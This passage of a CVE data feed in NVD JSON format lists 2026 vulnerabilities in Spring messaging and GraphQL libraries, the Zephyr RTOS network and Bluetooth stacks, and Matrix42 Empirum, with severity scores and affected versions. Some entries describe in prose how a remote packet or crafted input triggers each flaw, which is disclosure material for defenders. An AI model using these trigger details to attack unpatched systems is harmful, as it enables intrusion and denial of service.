Advisory"]}]}},{"cve":{"id":"CVE-2026-41731","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:52.597","lastModified":"2026-07-17T20:31:01.147","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"JsonKafkaHeaderMapper and the deprecated DefaultKafkaHeaderMapper matched type headers against trusted packages using a prefix check, meaning that trusting any package implicitly trusted all of its subpackages. Combined with Jackson's default bean deserialization, a producer could supply crafted header values that caused the consumer to deserialize arbitrary JDK types.\n\nAffected versions:\nSpring for Apache Kafka 4.0.0 through 4.0.5; 3.3.0 through 3.3.15; 3.2.0 through 3.2.13; 2.9.0 through 2.9.13; 2.8.0 through 2.8.11."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring for Apache Kafka","defaultStatus":"unaffected","versions":[{"version":"4.0.0","lessThan":"4.0.5.1","versionType":"custom","status":"affected"},{"version":"3.3.0","lessThan":"3.3.15.1","versionType":"custom","status":"affected"},{"version":"3.2.0","lessThan":"3.2.14","versionType":"custom","status":"affected"},{"version":"2.9.0","lessThan":"2.9.14","versionType":"custom","status":"affected"},{"version":"2.8.0","lessThan":"2.8.12","versionType":"custom","status":"affected"}]}]},{"source":"0b0ca135-0b70-47e7-9f44-1890c2a1c46c","affectedData":[{"vendor":"Red Hat","product":"Red Hat Fuse 7","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"spring-kafka","cpes":["cpe:/a:redhat:jboss_fuse:7"]},{"vendor":"Red Hat","product":"Red Hat JBoss Enterprise Application Platform Expansion Pack","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"spring-kafka","cpes":["cpe:/a:redhat:jbosseapxp"]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":5.9},{"source":"0b0ca135-0b70-47e7-9f44-1890c2a1c46c","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T17:18:09.377824Z","id":"CVE-2026-41731","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-502"}]},{"source":"0b0ca135-0b70-47e7-9f44-1890c2a1c46c","type":"Secondary","description":[{"lang":"en","value":"CWE-502"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionStartIncluding":"2.8.0","versionEndExcluding":"2.8.12","matchCriteriaId":"3210AF28-E5BC-4976-BF43-339DADA089FC"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionStartIncluding":"2.9.0","versionEndExcluding":"2.9.14","matchCriteriaId":"AA023945-8D2F-4B64-8819-AA41F087BC18"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionStartIncluding":"3.2.0","versionEndExcluding":"3.2.14","matchCriteriaId":"63E0CB29-F9CC-498A-8795-1344AECBBA74"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionStartIncluding":"3.3.0","versionEndExcluding":"3.3.15.1","matchCriteriaId":"2A5CE749-924C-46F0-AD18-1FAE9FA29FCC"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndExcluding":"4.0.5.1","matchCriteriaId":"00C97EF8-CDE8-47B9-B1B6-9DE53F3FF907"}]}]},{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:redhat:fuse:7.0.0:*:*:*:*:*:*:*","matchCriteriaId":"AAD91726-93D9-4230-BF69-6A79B58E09E0"},{"vulnerable":true,"criteria":"cpe:2.3:a:redhat:jboss_enterprise_application_platform_expansion_pack:-:*:*:*:*:*:*:*","matchCriteriaId":"0A24CBFB-4900-47A5-88D2-A44C929603DC"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41731","source":"security@vmware.com","tags":["Vendor Advisory"]},{"url":"https://access.redhat.com/security/cve/CVE-2026-41731","source":"0b0ca135-0b70-47e7-9f44-1890c2a1c46c","tags":["Third Party Advisory"]},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2487375","source":"0b0ca135-0b70-47e7-9f44-1890c2a1c46c","tags":["Issue Tracking","Third Party Advisory"]},{"url":"https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-41731.json","source":"0b0ca135-0b70-47e7-9f44-1890c2a1c46c","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2026-41732","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:52.720","lastModified":"2026-07-17T20:31:08.440","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"JsonPulsarHeaderMapper matched type headers against trusted packages using a prefix check, meaning that trusting any package implicitly trusted all of its subpackages. Additionally, an empty trusted-packages configuration fell back to trusting all packages rather than applying a safe default allow-list.\n\nAffected versions:\nSpring for Apache Pulsar 2.0.0 through 2.0.5; 1.2.0 through 1.2.17; 1.1.0 through 1.1.17."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring for Apache Pulsar","defaultStatus":"unaffected","versions":[{"version":"2.0.0","lessThan":"2.0.5.1","versionType":"custom","status":"affected"},{"version":"1.2.0","lessThan":"1.2.17.1","versionType":"custom","status":"affected"},{"version":"1.1.0","lessThan":"1.1.18","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T18:52:35.652237Z","id":"CVE-2026-41732","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-502"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_pulsar:*:*:*:*:*:*:*:*","versionStartIncluding":"1.1.0","versionEndExcluding":"1.1.18","matchCriteriaId":"BD99C33F-8DEF-4A9D-B331-C1FED95A6726"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_pulsar:*:*:*:*:*:*:*:*","versionStartIncluding":"1.2.0","versionEndExcluding":"1.2.17.1","matchCriteriaId":"CBA155E6-BFC7-4EAA-915C-9A542A9151B9"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_pulsar:*:*:*:*:*:*:*:*","versionStartIncluding":"2.0.0","versionEndExcluding":"2.0.6","matchCriteriaId":"301B7FE5-CDDF-4CE4-BC3F-0AE886D6FF26"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41732","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41837","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:52.830","lastModified":"2026-07-17T20:41:59.917","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring Data REST's Querydsl integration accepts arbitrary persistent property paths as request-parameter filter keys and does not consider Jackson customizations before handing them to Querydsl.\n\nAffected versions:\nSpring Data REST 3.7.0 through 3.7.19; 4.3.0 through 4.3.16; 4.4.0 through 4.4.14; 4.5.0 through 4.5.11; 5.0.0 through 5.0.5."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Data REST","defaultStatus":"unaffected","versions":[{"version":"3.7.0","lessThan":"3.7.20","versionType":"custom","status":"affected"},{"version":"4.3.0","lessThan":"4.3.17","versionType":"custom","status":"affected"},{"version":"4.4.0","lessThan":"4.4.15","versionType":"custom","status":"affected"},{"version":"4.5.0","lessThan":"4.5.11.1","versionType":"custom","status":"affected"},{"version":"5.0.0","lessThan":"5.0.5.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T17:13:36.935831Z","id":"CVE-2026-41837","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-284"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"3.7.0","versionEndExcluding":"3.7.20","matchCriteriaId":"D5AB0CD7-F756-4FCA-A328-B0F19CBDABD6"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"4.3.0","versionEndExcluding":"4.3.17","matchCriteriaId":"3FA3D040-BCC5-4C66-A0AF-5383AC89048E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"4.4.0","versionEndExcluding":"4.4.15","matchCriteriaId":"DEEF0B3D-C5D9-496A-B300-86876DE9F3B7"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"4.5.0","versionEndExcluding":"4.5.11.1","matchCriteriaId":"40757E5D-97AF-4680-A7F6-2EB1FD09D39E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"5.0.0","versionEndExcluding":"5.0.5.1","matchCriteriaId":"42C8C99B-7F57-4CEE-859A-C6A005C23EFB"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41837","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41699","sourceIdentifier":"security@vmware.com","published":"2026-06-11T07:16:28.280","lastModified":"2026-07-17T20:41:43.473","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring for GraphQL applications are vulnerable to Unsafe Deserialization when processing paginated GraphQL queries. An attacker can craft a malicious GraphQL request that can lead to Remote Code Execution when the application exposes a paginated (Connection) field and the classpath contains specific classes that can be leveraged during deserialization.\n\nAffected versions:\nSpring for GraphQL 2.0.0 through 2.0.3; 1.4.0 through 1.4.5; 1.3.0 through 1.3.8."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring for GraphQL","defaultStatus":"unaffected","versions":[{"version":"2.0.0","lessThan":"2.0.3.1","versionType":"custom","status":"affected"},{"version":"1.4.0","lessThan":"1.4.5.1","versionType":"custom","status":"affected"},{"version":"1.3.0","lessThan":"1.3.9","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-11T14:43:00.411379Z","id":"CVE-2026-41699","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-502"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_graphql:*:*:*:*:*:*:*:*","versionStartIncluding":"1.3.0","versionEndExcluding":"1.3.9","matchCriteriaId":"7F58A3E0-F0B6-41B9-9257-D20CF2396F2B"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_graphql:*:*:*:*:*:*:*:*","versionStartIncluding":"1.4.0","versionEndExcluding":"1.4.5.1","matchCriteriaId":"35C81108-F60D-4E58-9ADA-900321B3BEEC"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_graphql:*:*:*:*:*:*:*:*","versionStartIncluding":"2.0.0","versionEndExcluding":"2.0.3.1","matchCriteriaId":"061D9CA8-C971-42ED-8032-B2E2A2C6B864"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41699","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41700","sourceIdentifier":"security@vmware.com","published":"2026-06-11T07:16:28.400","lastModified":"2026-07-17T20:40:08.430","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring for GraphQL applications that have enabled the WebSocket transport are vulnerable to Cross-Site WebSocket Hijacking. An attacker can trick an authenticated user into visiting a malicious page, allowing the attacker to execute arbitrary GraphQL operations with the victim's credentials.\n\nAffected versions:\nSpring for GraphQL 2.0.0 through 2.0.3; 1.4.0 through 1.4.5; 1.3.0 through 1.3.8; 1.0.0 through 1.0.6."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring for GraphQL","defaultStatus":"unaffected","versions":[{"version":"2.0.0","lessThan":"2.0.3.1","versionType":"custom","status":"affected"},{"version":"1.4.0","lessThan":"1.4.5.1","versionType":"custom","status":"affected"},{"version":"1.3.0","lessThan":"1.3.9","versionType":"custom","status":"affected"},{"version":"1.0.0","lessThan":"1.0.7","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-11T14:43:29.371645Z","id":"CVE-2026-41700","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-346"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_graphql:*:*:*:*:*:*:*:*","versionStartIncluding":"1.0.0","versionEndExcluding":"1.0.7","matchCriteriaId":"8081FE74-21D1-4A99-BD7D-EC79761CC5FE"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_graphql:*:*:*:*:*:*:*:*","versionStartIncluding":"1.3.0","versionEndExcluding":"1.3.9","matchCriteriaId":"7F58A3E0-F0B6-41B9-9257-D20CF2396F2B"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_graphql:*:*:*:*:*:*:*:*","versionStartIncluding":"1.4.0","versionEndExcluding":"1.4.5.1","matchCriteriaId":"35C81108-F60D-4E58-9ADA-900321B3BEEC"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_graphql:*:*:*:*:*:*:*:*","versionStartIncluding":"2.0.0","versionEndExcluding":"2.0.3.1","matchCriteriaId":"061D9CA8-C971-42ED-8032-B2E2A2C6B864"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41700","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41856","sourceIdentifier":"security@vmware.com","published":"2026-06-11T07:16:28.513","lastModified":"2026-07-17T20:39:30.957","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"The Spring GraphQL annotation detection mechanism for @Controller data fetchers may not correctly resolve annotations on methods within type hierarchies. This can be an issue if such annotations are used for authorization decisions. When all conditions are met, security annotations can be ignored at runtime.\n\nAffected versions:\nSpring for GraphQL 2.0.0 through 2.0.3; 1.4.0 through 1.4.5; 1.3.0 through 1.3.8; 1.0.0 through 1.0.6."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring for GraphQL","defaultStatus":"unaffected","versions":[{"version":"2.0.0","lessThan":"2.0.3.1","versionType":"custom","status":"affected"},{"version":"1.4.0","lessThan":"1.4.5.1","versionType":"custom","status":"affected"},{"version":"1.3.0","lessThan":"1.3.9","versionType":"custom","status":"affected"},{"version":"1.0.0","lessThan":"1.0.7","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-11T15:16:49.624069Z","id":"CVE-2026-41856","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-284"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_graphql:*:*:*:*:*:*:*:*","versionStartIncluding":"1.0.0","versionEndExcluding":"1.0.7","matchCriteriaId":"8081FE74-21D1-4A99-BD7D-EC79761CC5FE"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_graphql:*:*:*:*:*:*:*:*","versionStartIncluding":"1.3.0","versionEndExcluding":"1.3.9","matchCriteriaId":"7F58A3E0-F0B6-41B9-9257-D20CF2396F2B"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_graphql:*:*:*:*:*:*:*:*","versionStartIncluding":"1.4.0","versionEndExcluding":"1.4.5.1","matchCriteriaId":"35C81108-F60D-4E58-9ADA-900321B3BEEC"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_graphql:*:*:*:*:*:*:*:*","versionStartIncluding":"2.0.0","versionEndExcluding":"2.0.3.1","matchCriteriaId":"061D9CA8-C971-42ED-8032-B2E2A2C6B864"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41856","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-10638","sourceIdentifier":"vulnerabilities@zephyrproject.org","published":"2026-06-16T15:16:34.097","lastModified":"2026-07-17T23:16:34.880","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"subsys/net/ip/icmpv6.c reads the network interface from a net_pkt after that packet has been handed to net_try_send_data(). In icmpv6_handle_echo_request() and net_icmpv6_send_error(), the post-send statistics update calls net_pkt_iface(reply)/net_pkt_iface(pkt) on the just-sent packet.\n\nThe send path (net_try_send_data -> net_if_tx) unreferences and may free the packet back to its memory slab before returning — synchronously in the RX thread when no TX queue is configured (CONFIG_NET_TC_TX_COUNT == 0), and asynchronously the driver/L2 may already have freed it otherwise. net_pkt_iface() therefore dereferences a freed (and possibly reused) net_pkt; with CONFIG_NET_STATISTICS_PER_INTERFACE the stale iface pointer is further dereferenced and written through (iface->stats.icmp.sent++), turning the use-after-free read into a write through an attacker-influenceable pointer.\n\nThe core stack already documents this hazard in net_core.c (\"do not use pkt after that call\") and caches iface before sending; the ICMPv6 callers did not.\n\nAn unauthenticated remote attacker triggers the flaw simply by sending an ICMPv6 Echo Request (ping) or an IPv6 packet that elicits an ICMPv6 error (unknown next header, fragment reassembly timeout, destination unreachable), leading to denial of service via crash and potential memory corruption. Affected: Zephyr networking with CONFIG_NET_NATIVE_IPV6, roughly v4.2.0 through v4.4.0.\n\nThe fix caches the interface pointer before sending and uses it for all statistics updates; the sibling commit 86e21665d46 fixes the identical bug in ICMPv4."}],"affected":[{"source":"vulnerabilities@zephyrproject.org","affectedData":[{"vendor":"zephyrproject","product":"zephyr","defaultStatus":"unaffected","collectionURL":"https://github.com/zephyrproject-rtos/zephyr","packageName":"zephyr","programFiles":["subsys/net/ip/icmpv6.c"],"versions":[{"version":"3.7.0","lessThan":"4.5.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"vulnerabilities@zephyrproject.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-16T15:29:46.610373Z","id":"CVE-2026-10638","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"vulnerabilities@zephyrproject.org","type":"Secondary","description":[{"lang":"en","value":"CWE-416"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:zephyrproject:zephyr:*:*:*:*:*:*:*:*","versionStartIncluding":"4.2.0","versionEndExcluding":"4.5.0","matchCriteriaId":"B4B6E024-A0B6-48E0-A4F6-FF276949270A"}]}]}],"references":[{"url":"https://github.com/zephyrproject-rtos/zephyr/commit/09c8578c66b517c5165cde53332ed5d8d8ef2cfc","source":"vulnerabilities@zephyrproject.org","tags":["Patch"]},{"url":"https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-m92g-94xv-wvw2","source":"vulnerabilities@zephyrproject.org","tags":["Broken Link"]}]}},{"cve":{"id":"CVE-2026-10651","sourceIdentifier":"vulnerabilities@zephyrproject.org","published":"2026-06-23T01:16:26.747","lastModified":"2026-07-17T16:17:12.760","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"bt_sdp_parse_attribute() in subsys/bluetooth/host/classic/sdp.c validated only that the SDP record buffer held the type-marker byte plus the 2-byte attribute ID (a check of buf->len < 3) but then read a fourth byte, the data-element descriptor (type), via net_buf_simple_pull_u8(). Because net_buf_simple_pull_u8() dereferences buf->data[0] before its only bounds guard (an __ASSERT_NO_MSG that compiles out when CONFIG_ASSERT is disabled, the production default), a record of exactly three bytes (0x09 followed by a 2-byte attribute ID) causes a one-byte read past the end of the logical buffer. The parser is reachable from inbound, remote-controlled data: a Bluetooth BR/EDR peer acting as an SDP server returns discovery-response records that are stored verbatim in the client receive buffer and parsed via the public bt_sdp_get_attr()/bt_sdp_has_attr()/bt_sdp_record_parse() helpers. The over-read is bounded to a single byte that is used only as an internal length selector and is never leaked to the attacker; subsequent length checks then reject the malformed record. Realistic impact is therefore limited to an edge-case denial of service (a fault only if the record ends exactly at a mapped-memory boundary, or a deterministic assert panic when CONFIG_ASSERT=y). Affects Zephyr v4.3.0 and v4.4.0; fixed by adding sizeof(type) to the length check."}],"affected":[{"source":"vulnerabilities@zephyrproject.org","affectedData":[{"vendor":"zephyrproject","product":"zephyr","defaultStatus":"unaffected","collectionURL":"https://github.com/zephyrproject-rtos/zephyr","packageName":"zephyr","programFiles":["subsys/bluetooth/host/classic/sdp.c"],"versions":[{"version":"4.3.0","lessThan":"4.5.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"vulnerabilities@zephyrproject.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":4.2},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-23T12:19:37.226064Z","id":"CVE-2026-10651","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"vulnerabilities@zephyrproject.org","type":"Secondary","description":[{"lang":"en","value":"CWE-20"},{"lang":"en","value":"CWE-617"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:zephyrproject:zephyr:*:*:*:*:*:*:*:*","versionEndIncluding":"4.4.1","matchCriteriaId":"9A947003-969D-455C-8C9D-6AF56EDB9330"}]}]}],"references":[{"url":"https://github.com/zephyrproject-rtos/zephyr/commit/dfac5224ab65fc7b81be2926386173c169318335","source":"vulnerabilities@zephyrproject.org"},{"url":"https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-p93g-3r68-cj53","source":"vulnerabilities@zephyrproject.org","tags":["Exploit","Patch","Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-57919","sourceIdentifier":"cve@mitre.org","published":"2026-06-29T20:17:40.160","lastModified":"2026-07-17T16:17:15.690","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"PBackupVSS.exe in Matrix42 Empirum before 25.5 and 26.x before 26.2 creates a named pipe (\\\\.\\pipe\\PBackupVSS) with a DACL that grants GENERIC_READ and GENERIC_WRITE 